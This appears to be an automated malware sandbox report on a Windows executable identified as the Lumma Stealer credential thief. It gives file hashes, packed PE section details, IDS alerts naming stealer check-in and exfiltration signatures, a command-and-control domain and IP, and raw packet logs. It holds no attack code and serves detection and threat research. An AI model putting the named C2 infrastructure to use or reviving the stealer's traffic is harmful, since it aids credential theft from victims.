Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
22:31:04	API Interceptor	8x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.64.1	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	attachDocx.docx	Get hash	malicious	Unknown	Browse
	Voicemail_+Transcription001799.docx	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
atten-supporse.biz	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.16.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig	Browse	104.21.32.1
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	104.21.80.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.48.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.16.1
	la.bot.mips.elf	Get hash	malicious	Mirai	Browse	162.159.25.122
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1
	Updates.bat	Get hash	malicious	Abobus Obfuscator	Browse	172.65.251.78
	http://842991738.747100519.128322614.784396125.visitorchecking.ru/?ws=628584733.299643379.127950398.351850602	Get hash	malicious	Unknown	Browse	172.67.134.63
	rPurchaseOrder_PO19202409.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	CLDownloader.exe	Get hash	malicious	XWorm	Browse	172.67.70.46
	CLDownloader.exe	Get hash	malicious	XWorm	Browse	104.26.2.141
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.64.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig	Browse	104.21.64.1
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	104.21.64.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.64.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.948367811501745
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'832'448 bytes
MD5:	73f9c0001107eb1b3aab6549c6574f7f
SHA1:	92f5d81090d2cb7ff8be9764e7b69dca16ba44da
SHA256:	d1f439cd24726a4ed6001304ea33e413856a7242292f750088e66696bb5aecaa
SHA512:	4026d6b9ecb2aafbb293533ee6221c2b3dc4d1bcfcd5cbec28275e1848b586139ba790cbb7446f9f33e256a9d67282f09586774018236592fe6c103cf9dc7e9c
SSDEEP:	49152:L1mIPcOWjN7v3Ga6hokN3NLz8KkylxR3LdJwvw:L1mIPH8Nut3Z//3Ld+
TLSH:	AD85336CA4192F75EC5C8CBADA3347CDBE307B91B686C7CDB45E5921229E7C2B4A500C
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ug..............................H...........@...........................H...........@.................................\@..p..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x88c000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6755B9EA [Sun Dec 8 15:23:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FF161119C7Ah
paddq mm3, qword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5405c	0x70	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x53000	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x24200	b43435c75bb96f15fcc68ed65a10300e	False	0.9976143490484429	data	7.983244716136416	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x2b0	0x400	fe67bb2a9df3150b9c94de8bd81ed8a0	False	0.3603515625	data	5.186832724894366	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	f89f2f28be6f3fc6a464feb82ace12f3	False	0.15625	data	1.1194718105633323	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x55000	0x29e000	0x200	09c1e963263796b5ed659b121c4947f4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
sbjgrbkb	0x2f3000	0x198000	0x197600	abfc2998bcf04a70e2175a6d5e9652a0	False	0.9943977255293035	data	7.954135504267137	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
biqspjfj	0x48b000	0x1000	0x400	bb13d50edce0aa692ac0fbd1ed5939fb	False	0.798828125	data	6.250686795261228	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x48c000	0x3000	0x2200	efd7c2f4ab0870d34251e1158b0f494d	False	0.10294117647058823	DOS executable (COM)	1.1154642213994705	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x53058	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-10T04:31:02.986386+0100	2057921	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)	1	192.168.2.5	59033	1.1.1.1	53	UDP
2024-12-10T04:31:04.534618+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49704	104.21.64.1	443	TCP
2024-12-10T04:31:04.534618+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49704	104.21.64.1	443	TCP
2024-12-10T04:31:05.270071+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49704	104.21.64.1	443	TCP
2024-12-10T04:31:05.270071+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49704	104.21.64.1	443	TCP
2024-12-10T04:31:06.665618+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49705	104.21.64.1	443	TCP
2024-12-10T04:31:06.665618+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	104.21.64.1	443	TCP
2024-12-10T04:31:07.691611+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49705	104.21.64.1	443	TCP
2024-12-10T04:31:07.691611+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49705	104.21.64.1	443	TCP
2024-12-10T04:31:09.324616+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49706	104.21.64.1	443	TCP
2024-12-10T04:31:09.324616+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49706	104.21.64.1	443	TCP
2024-12-10T04:31:11.574639+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49707	104.21.64.1	443	TCP
2024-12-10T04:31:11.574639+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49707	104.21.64.1	443	TCP
2024-12-10T04:31:13.961991+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49708	104.21.64.1	443	TCP
2024-12-10T04:31:13.961991+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	104.21.64.1	443	TCP
2024-12-10T04:31:17.776474+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49709	104.21.64.1	443	TCP
2024-12-10T04:31:17.776474+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49709	104.21.64.1	443	TCP
2024-12-10T04:31:18.528544+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49709	104.21.64.1	443	TCP
2024-12-10T04:31:20.302083+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49712	104.21.64.1	443	TCP
2024-12-10T04:31:20.302083+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49712	104.21.64.1	443	TCP
2024-12-10T04:31:20.307997+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	49712	104.21.64.1	443	TCP
2024-12-10T04:31:26.956025+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49722	104.21.64.1	443	TCP
2024-12-10T04:31:26.956025+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49722	104.21.64.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 04:31:03.314822912 CET	49704	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:03.314858913 CET	443	49704	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:03.314968109 CET	49704	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:03.316307068 CET	49704	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:03.316323996 CET	443	49704	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:04.534535885 CET	443	49704	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:04.534617901 CET	49704	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:04.537942886 CET	49704	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:04.537954092 CET	443	49704	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:04.538172007 CET	443	49704	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:04.579150915 CET	49704	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:04.579190016 CET	49704	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:04.579232931 CET	443	49704	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:05.270076990 CET	443	49704	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:05.270164967 CET	443	49704	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:05.270225048 CET	49704	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:05.342341900 CET	49704	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:05.342365980 CET	443	49704	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:05.342376947 CET	49704	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:05.342382908 CET	443	49704	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:05.452164888 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:05.452207088 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:05.452286959 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:05.452589035 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:05.452601910 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:06.665537119 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:06.665617943 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:06.666786909 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:06.666796923 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:06.666996956 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:06.668056011 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:06.668072939 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:06.668114901 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.691598892 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.691653013 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.691685915 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.691716909 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.691745043 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.691772938 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.691788912 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:07.691823006 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.691843987 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:07.704577923 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.704622984 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.704689980 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:07.704706907 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.704765081 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:07.810781956 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.862042904 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:07.862060070 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.885848045 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.885885000 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.885931015 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:07.885942936 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.885983944 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:07.893496990 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.893616915 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.893675089 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:07.952888012 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:07.952924013 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:07.952938080 CET	49705	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:07.952946901 CET	443	49705	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:08.106883049 CET	49706	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:08.106933117 CET	443	49706	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:08.107034922 CET	49706	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:08.107327938 CET	49706	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:08.107343912 CET	443	49706	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:09.323790073 CET	443	49706	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:09.324615955 CET	49706	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:09.325196028 CET	49706	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:09.325227022 CET	443	49706	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:09.325458050 CET	443	49706	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:09.326716900 CET	49706	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:09.326863050 CET	49706	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:09.326900005 CET	443	49706	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:10.249591112 CET	443	49706	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:10.249722958 CET	443	49706	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:10.249784946 CET	49706	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:10.249840021 CET	49706	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:10.249860048 CET	443	49706	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:10.364320993 CET	49707	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:10.364368916 CET	443	49707	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:10.364465952 CET	49707	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:10.364833117 CET	49707	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:10.364845037 CET	443	49707	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:11.574553967 CET	443	49707	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:11.574639082 CET	49707	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:11.575789928 CET	49707	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:11.575799942 CET	443	49707	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:11.576001883 CET	443	49707	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:11.577133894 CET	49707	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:11.577270031 CET	49707	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:11.577300072 CET	443	49707	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:11.577356100 CET	49707	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:11.619338036 CET	443	49707	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:12.503362894 CET	443	49707	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:12.503478050 CET	443	49707	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:12.503550053 CET	49707	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:12.503658056 CET	49707	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:12.503675938 CET	443	49707	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:12.751321077 CET	49708	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:12.751374006 CET	443	49708	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:12.751450062 CET	49708	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:12.751729012 CET	49708	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:12.751749039 CET	443	49708	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:13.961874008 CET	443	49708	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:13.961991072 CET	49708	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:13.963576078 CET	49708	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:13.963584900 CET	443	49708	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:13.963823080 CET	443	49708	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:13.965370893 CET	49708	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:13.965477943 CET	49708	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:13.965523958 CET	443	49708	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:13.965600967 CET	49708	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:13.965610027 CET	443	49708	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:16.165170908 CET	443	49708	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:16.165266991 CET	443	49708	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:16.165360928 CET	49708	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:16.165692091 CET	49708	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:16.165714979 CET	443	49708	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:16.564732075 CET	49709	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:16.564769983 CET	443	49709	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:16.564851999 CET	49709	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:16.565521002 CET	49709	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:16.565534115 CET	443	49709	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:17.776366949 CET	443	49709	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:17.776473999 CET	49709	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:17.778059006 CET	49709	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:17.778070927 CET	443	49709	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:17.778299093 CET	443	49709	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:17.779714108 CET	49709	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:17.779818058 CET	49709	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:17.779823065 CET	443	49709	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:18.528507948 CET	443	49709	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:18.528589010 CET	443	49709	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:18.528657913 CET	49709	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:18.528820038 CET	49709	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:18.528836966 CET	443	49709	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:19.084566116 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:19.084604025 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:19.085547924 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:19.085978031 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:19.085989952 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:20.301995993 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:20.302083015 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.304156065 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.304173946 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:20.304466963 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:20.306210995 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.307136059 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.307171106 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:20.307276011 CET	49712	443	192.168.2.5	104.21.64.1
